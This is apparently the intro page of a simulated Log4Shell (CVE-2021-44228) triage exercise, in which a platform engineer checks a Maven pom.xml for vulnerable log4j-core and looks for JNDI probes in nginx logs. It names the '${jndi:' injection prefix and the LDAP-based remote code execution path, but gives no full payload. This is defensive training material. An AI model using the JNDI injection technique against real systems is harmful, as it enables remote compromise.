${jndi:

December 2021. A string in a log line should be inert. In Log4j 2.x, it is a remote code execution primitive, through LDAP, through your own logging pipeline.

Type

Classic

Difficulty

Intermediate

Era

2020s

Time

10 min

Briefing

CVE-2021-44228, Log4Shell. This exhibit is triage: `pom.xml` plus nginx logs. No outbound LDAP from the museum terminal.

Your role

Platform engineer replaying December 10th: Maven coordinates, access logs, and the one-line patch.

Objective

Confirm vulnerable `log4j-core` on the classpath and find attacker probes in `access.log` using the JNDI lookup prefix.

Terminal environment

user: responder
host: prod-java-trace
cwd: /srv/payments-api
steps: 3

Enter the terminalAbout 10 minutesSafe simulation

Safety note. This is a safe reconstruction. All systems, files, hosts, credentials, and outputs are simulated. Do not use these techniques on systems you do not own or have explicit permission to test.